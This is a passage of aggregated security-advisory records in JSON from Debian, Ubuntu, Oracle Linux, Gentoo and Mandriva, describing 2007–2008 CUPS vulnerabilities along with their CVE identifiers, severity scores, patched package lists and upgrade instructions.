6052b09bd8c4cb9600156b24f185122a\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_sparc.deb\n Size/MD5 checksum: 139570 2aa5b4d2d64849aa048489332f7e3aca\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_sparc.deb\n Size/MD5 checksum: 1561428 59199c965cba64d0aaf9a2de6c3432b6\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_sparc.deb\n Size/MD5 checksum: 84282 edec6a1d4af9df91f2d2b5c20553dbe9\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_sparc.deb\n Size/MD5 checksum: 990474 e276a14d21a6d7661c91c3420c96e142\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_sparc.deb\n Size/MD5 checksum: 158256 d43c9657a710bb5969e704208502f59f\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_sparc.deb\n Size/MD5 checksum: 78514 32c106b3332c95dd0f24d6cf5d208add\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_sparc.deb\n Size/MD5 checksum: 36020 751c12e8f83f04b5fd54d4a23abdf6fc\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2007-12-26T13:20:46", "published": "2007-12-26T13:20:46", "id": "DEBIAN:DSA-1437-1:07CDC", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00219.html", "title": "[SECURITY] [DSA 1437-1] New cupsys packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:27:28", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6358", "CVE-2007-5849"], "description": "Wei Wang discovered that the SNMP discovery backend did not \ncorrectly calculate the length of strings. If a user were tricked into \nscanning for printers, a remote attacker could send a specially crafted \npacket and possibly execute arbitrary code.\n\nElias Pipping discovered that temporary files were not handled safely \nin certain situations when converting PDF to PS. A local attacker could \ncause a denial of service.", "edition": 5, "modified": "2008-01-09T00:00:00", "published": "2008-01-09T00:00:00", "id": "USN-563-1", "href": "https://ubuntu.com/security/notices/USN-563-1", "title": "CUPS vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0597", "CVE-2007-5848", "CVE-2008-0596"], "description": " [1.1.22-0.rc1.9.20.2:.5]\n - Prevented invalid memory accesses when a class and its singleton printer\n are timed out in the same sweep (CVE-2008-0597, bug #433828).\n - Back-ported mimeDeleteType from 1.2.x (CVE-2008-0596, bug #433828).\n \n [1.1.22-0.rc1.9.20.2:.4]\n - Prevent double-free when a browsed class has the same name as a printer\n or vice versa (bug #433764, STR #2656).\n - Reverted previous change as no security impact (bug #418371).\n \n [1.1.22-0.rc1.9.20.2:.3]\n - Applied patch to fix CVE-2007-5848 (bug #418371). ", "edition": 4, "modified": "2008-02-25T00:00:00", "published": "2008-02-25T00:00:00", "id": "ELSA-2008-0161", "href": "http://linux.oracle.com/errata/ELSA-2008-0161.html", "title": "Important: cups security update ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0597", "CVE-2007-5848", "CVE-2008-0596"], "description": " [1.1.17-13.3.51]\n - Prevented invalid memory accesses when a class and its singleton printer\n are timed out in the same sweep (CVE-2008-0597, bug #433827).\n \n [1.1.17-13.3.50]\n - Back-ported mimeDeleteType from 1.2.x (CVE-2008-0596, bug #433827).\n \n [1.1.17-13.3.49]\n - Prevent double-free when a browsed class has the same name as a printer\n or vice versa (bug #433763, STR #2656).\n \n [1.1.17-13.3.48]\n - Removed mandatory debugging output from cups-polld (bug #246545), \n which had\n been introduced by this change:\n - Backported cups-polld fixes (bug #205694).\n - Reverted previous change as no security impact (bug #418361).\n \n [1.1.17-13.3.47]\n - Applied patch to fix CVE-2007-5848 (bug #418361). ", "edition": 4, "modified": "2008-02-25T00:00:00", "published": "2008-02-25T00:00:00", "id": "ELSA-2008-0153", "href": "http://linux.oracle.com/errata/ELSA-2008-0153.html", "title": "Important: cups security update ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:17", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6358", "CVE-2007-4045", "CVE-2007-5849"], "description": "### Background\n\nCUPS provides a portable printing layer for UNIX-based operating systems. The alternate pdftops filter is a CUPS filter used to convert PDF files to the Postscript format via Poppler; the filter is installed by default in Gentoo Linux. \n\n### Description\n\nWei Wang (McAfee AVERT Research) discovered an integer underflow in the asn1_get_string() function of the SNMP backend, leading to a stack-based buffer overflow when handling SNMP responses (CVE-2007-5849). Elias Pipping (Gentoo) discovered that the alternate pdftops filter creates temporary files with predictable file names when reading from standard input (CVE-2007-6358). Furthermore, the resolution of a Denial of Service vulnerability covered in GLSA 200703-28 introduced another Denial of Service vulnerability within SSL handling (CVE-2007-4045). \n\n### Impact\n\nA remote attacker on the local network could exploit the first vulnerability to execute arbitrary code with elevated privileges by sending specially crafted SNMP messages as a response to an SNMP broadcast request. A local attacker could exploit the second vulnerability to overwrite arbitrary files with the privileges of the user running the CUPS spooler (usually lp) by using symlink attacks. A remote attacker could cause a Denial of Service condition via the third vulnerability when SSL is enabled in CUPS. \n\n### Workaround\n\nTo disable SNMP support in CUPS, you have have to manually delete the file \"/usr/libexec/cups/backend/snmp\". Please note that the file is reinstalled if you merge CUPS again later. To disable the pdftops filter, delete all lines referencing \"pdftops\" in CUPS' \"mime.convs\" configuration file. To work around the third vulnerability, disable SSL support via the corresponding USE flag. \n\n### Resolution\n\nAll CUPS users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-1.2.12-r4\"", "edition": 1, "modified": "2007-12-18T00:00:00", "published": "2007-12-18T00:00:00", "id": "GLSA-200712-14", "href": "https://security.gentoo.org/glsa/200712-14", "type": "gentoo", "title": "CUPS: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2026", "CVE-2007-4995", "CVE-2013-0339", "CVE-2010-1205", "CVE-2007-3108", "CVE-2007-2741", "CVE-2007-5269", "CVE-2013-0338", "CVE-2007-5135", "CVE-2007-5268", "CVE-2013-2877", "CVE-2007-5116", "CVE-2014-0160", "CVE-2007-5266", "CVE-2007-0720", "CVE-2013-1969", "CVE-2007-2445", "CVE-2013-1664", "CVE-2007-1536", "CVE-2007-5849"], "edition": 1, "description": "### Background\n\nAMD64 x86 emulation base libraries provides pre-compiled 32-bit libraries. \n\n### Description\n\nMultiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker may be able to execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll users of the AMD64 x86 emulation base libraries should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/emul-linux-x86-baselibs-20140406-r1\"\n \n\nNOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. It is likely that your system is already no longer affected by them.", "modified": "2014-12-12T00:00:00", "published": "2014-12-12T00:00:00", "id": "GLSA-201412-11", "href": "https://security.gentoo.org/glsa/201412-11", "type": "gentoo", "title": "AMD64 x86 emulation base libraries: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:25", "bulletinFamily": "software", "cvelist": ["CVE-2008-0597", "CVE-2007-5848", "CVE-2008-0596", "CVE-2008-0886", "CVE-2008-0882"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDVSA-2008:050\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : cups\r\n Date : February 26, 2008\r\n Affected: Corporate 3.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n Dave Camp at Critical Path Software discovered a buffer overflow\r\n in CUPS 1.1.23 and earlier could allow local admin users to execute\r\n arbitrary code via a crafted URI to the CUPS service (CVE-2007-5848).\r\n \r\n The Red Hat Security Team also found two flaws in CUPS 1.1.x where\r\n a malicious user on the local subnet could send a set of carefully\r\n crafted IPP packets to the UDP port in such a way as to cause CUPS\r\n to crash (CVE-2008-0597) or consume memory and lead to a CUPS crash\r\n (CVE-2008-0596).\r\n \r\n Finally, another flaw was found in how CUPS handled the addition and\r\n removal of remote printers via IPP that could allow a remote attacker\r\n to send a malicious IPP packet to the UDP port causing CUPS to crash\r\n (CVE-2008-0882).\r\n \r\n The updated packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5848\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0596\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0597\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0886\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Corporate 3.0:\r\n 71c1bd1c9099440da3e9afcfe4636525 corporate/3.0/i586/cups-1.1.20-5.16.C30mdk.i586.rpm\r\n a73fba38dbcf62fd4c64590e5d754126 corporate/3.0/i586/cups-common-1.1.20-5.16.C30mdk.i586.rpm\r\n 60b6e82788d5b0c51f68b0db44e31240 corporate/3.0/i586/cups-serial-1.1.20-5.16.C30mdk.i586.rpm\r\n 419d078e2df1396531c23cbbf2f2785d corporate/3.0/i586/libcups2-1.1.20-5.16.C30mdk.i586.rpm\r\n 064e5b42b27c90602bf8e7c47200bef8 corporate/3.0/i586/libcups2-devel-1.1.20-5.16.C30mdk.i586.rpm \r\n 5c363b9a8573a4ae3da5e654da34bae5 corporate/3.0/SRPMS/cups-1.1.20-5.16.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n c33aff1c5bab9bce22f7a018f2fbfe7d corporate/3.0/x86_64/cups-1.1.20-5.16.C30mdk.x86_64.rpm\r\n ba1cba41b479e332e8d43652af86756d corporate/3.0/x86_64/cups-common-1.1.20-5.16.C30mdk.x86_64.rpm\r\n 211561645f6743343a0a9189ecd8e24e corporate/3.0/x86_64/cups-serial-1.1.20-5.16.C30mdk.x86_64.rpm\r\n d1cb2198f9b73cfb5d2ae3d69bacf12c corporate/3.0/x86_64/lib64cups2-1.1.20-5.16.C30mdk.x86_64.rpm\r\n 104350956cda23c2e2f5bb05a22df9c7 corporate/3.0/x86_64/lib64cups2-devel-1.1.20-5.16.C30mdk.x86_64.rpm \r\n 5c363b9a8573a4ae3da5e654da34bae5 corporate/3.0/SRPMS/cups-1.1.20-5.16.C30mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (GNU/Linux)\r\n\r\niD8DBQFHxGl7mqjQ0CJFipgRAgVuAJ9rJyJ0ysTKDyXgzUhz1Yl5SEP38wCg9SSt\r\nG00zNYjRErOH1eJ5lnnUNVs=\r\n=sKtb\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-02-27T00:00:00", "published": "2008-02-27T00:00:00", "id": "SECURITYVULNS:DOC:19288", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19288", "title": "[ MDVSA-2008:050 ] - Updated cups packages fix multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "cvelist": ["CVE-2008-0597", "CVE-2007-5848", "CVE-2008-0596", "CVE-2008-0886", "CVE-2008-0882", "CVE-2008-0047"], "description": "Code execution on URI handling, multiple DoS conditions.", "edition": 1, "modified": "2008-02-27T00:00:00", "published": "2008-02-27T00:00:00", "id": "SECURITYVULNS:VULN:8724", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8724", "title": "Cups multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
